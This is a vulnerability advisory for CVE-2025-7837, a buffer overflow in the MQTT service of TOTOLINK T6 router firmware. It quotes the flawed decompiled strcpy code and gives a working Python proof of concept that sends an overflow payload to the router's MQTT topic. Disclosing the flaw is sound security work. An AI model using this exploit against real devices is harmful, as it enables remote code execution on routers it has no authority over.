### Key Information #### Vulnerability Identifier - **CVE ID**: CVE-2025-7837 #### Affected Scope - **Vendor**: TOTOLINK - **Affected Product**: T6 - **Affected Firmware Version**: V4.1.5cu.748_B20211015 #### Vulnerability Overview - **Vulnerability Type**: Buffer Overflow - **Affected Service**: MQTT Service - **Port**: 1883 - **Consequence**: Remote Code Execution (RCE) #### Vulnerability Details - **Problematic Function**: `recvSlaveStaInfo` - **Description**: The `strcpy` function is used without checking the input length, leading to a buffer overflow when processing input data. - **Critical Code Snippet**: ```c char dest[4]; // [sp+0h] [bp-10h] BYREF int v9; // [sp+4h] [bp-Ch] int v10; // [sp+8h] [bp-8h] int v11; // [sp+Ch] [bp-4h] v4 = dest; strcpy(dest, Var); ``` #### POC (Proof of Concept) - **Python Code Example**: ```python import paho.mqtt.client as mqtt payload = b"A" * 36 + b"\x37\x33\x39\x33" client = mqtt.Client() client.connect("192.168.8.1", 1883, 60) client.publish("/totolink/router/recvSlaveStaInfo", b'{"slavemac":"%s"}' % payload) ```